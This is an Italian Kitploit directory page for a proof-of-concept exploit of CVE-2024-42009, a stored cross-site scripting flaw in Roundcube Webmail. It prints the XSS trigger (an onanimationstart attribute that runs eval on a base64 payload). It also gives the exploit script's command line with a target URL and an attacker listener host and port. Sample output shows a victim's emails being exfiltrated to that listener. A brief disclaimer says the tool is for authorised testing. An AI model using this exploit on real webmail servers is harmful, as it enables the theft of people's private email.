Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42009-PoC — CVE-2024-42009 Prova di concetto | Kitploit
Strumenti/GitHubGitHub/danithehack3r/cve-2024-42009-poc
Strumenti di PhishingExploitSfruttamento di Applicazioni WebEsfiltrazione DatiApprendimento e FormazioneSicurezza Email
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

CVE-2024-42009 Prova di concetto

Vedi Repository
71481 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-42009 PoC: Listener per la cattura di email ed exploit XSS in Roundcube Webmail

Panoramica

Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2024-42009, una vulnerabilità di Cross-Site Scripting (XSS) persistente in Roundcube Webmail versione 1.6.7 e in diverse altre versioni. L'exploit dimostra come un attaccante possa iniettare JavaScript dannoso in un messaggio e sfruttare un problema di desanitizzazione durante l'analisi dell'HTML all'interno del messaggio, che può quindi essere utilizzato per esfiltrare il contenuto delle email dalla casella di posta della vittima in questo esempio, o addirittura prendere il controllo del browser della vittima.

Dettagli della Vulnerabilità

Descrizione della CVE

Una vulnerabilità di Cross-Site Scripting in Roundcube fino alla 1.5.7 e 1.6.x fino alla 1.6.7 consente a un attaccante remoto di rubare e inviare email di una vittima tramite un messaggio di posta elettronica appositamente creato che sfrutta un problema di desanitizzazione in message_body() in program/actions/mail/show.php.

Spiegazione del Payload XSS (per questo esempio)

L'exploit utilizza un trigger di animazione CSS per l'esecuzione XSS:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

Il body viene analizzato come un div, e quindi dobbiamo adattarci a questo; per questo usiamo l'attributo onanimationstart per chiamare la funzione eval ed eseguire chiamate JavaScript complesse da esso. Per approfondire come funziona l'exploit e dove si trovano le vulnerabilità in Roundcube, leggi questo articolo.

Ambito

  • Questo exploit è stato testato solo su Roundcube Webmail versione 1.6.7
  • La vittima deve aprire il messaggio per vedere i suoi contenuti
  • Potrebbe fallire se la Content Security Policy (CSP) è configurata correttamente

Utilizzo

Dipendenze

Installa i pacchetti Python richiesti:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

Argomenti della Riga di Comando

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • Target URL: In questo caso stiamo usando l'endpoint del modulo di contatto che gestisce i messaggi e poi li inoltra (es., http://email.company.local/contact)
  • Email del destinatario: Indirizzo email valido che riceverà il messaggio dannoso
  • Host del listener: L'indirizzo IP del tuo sistema accessibile dal target
  • Porta del listener: Porta disponibile per il server HTTP (es., 4444)

Esempio di Utilizzo

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

Output Atteso

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

Riferimenti

Ricerca sulla Vulnerabilità

  • Blog di SonarSource: Email governative a rischio - Vulnerabilità critica di Cross-Site Scripting in Roundcube Webmail
  • Video dimostrativo di SonarSource

Disclaimer Legale

⚠️ IMPORTANTE: Questa proof-of-concept è fornita solo per scopi educativi e di test autorizzati. Usala in modo responsabile e questo account non è responsabile per eventuali danni causati da altri.

Scarica lo strumento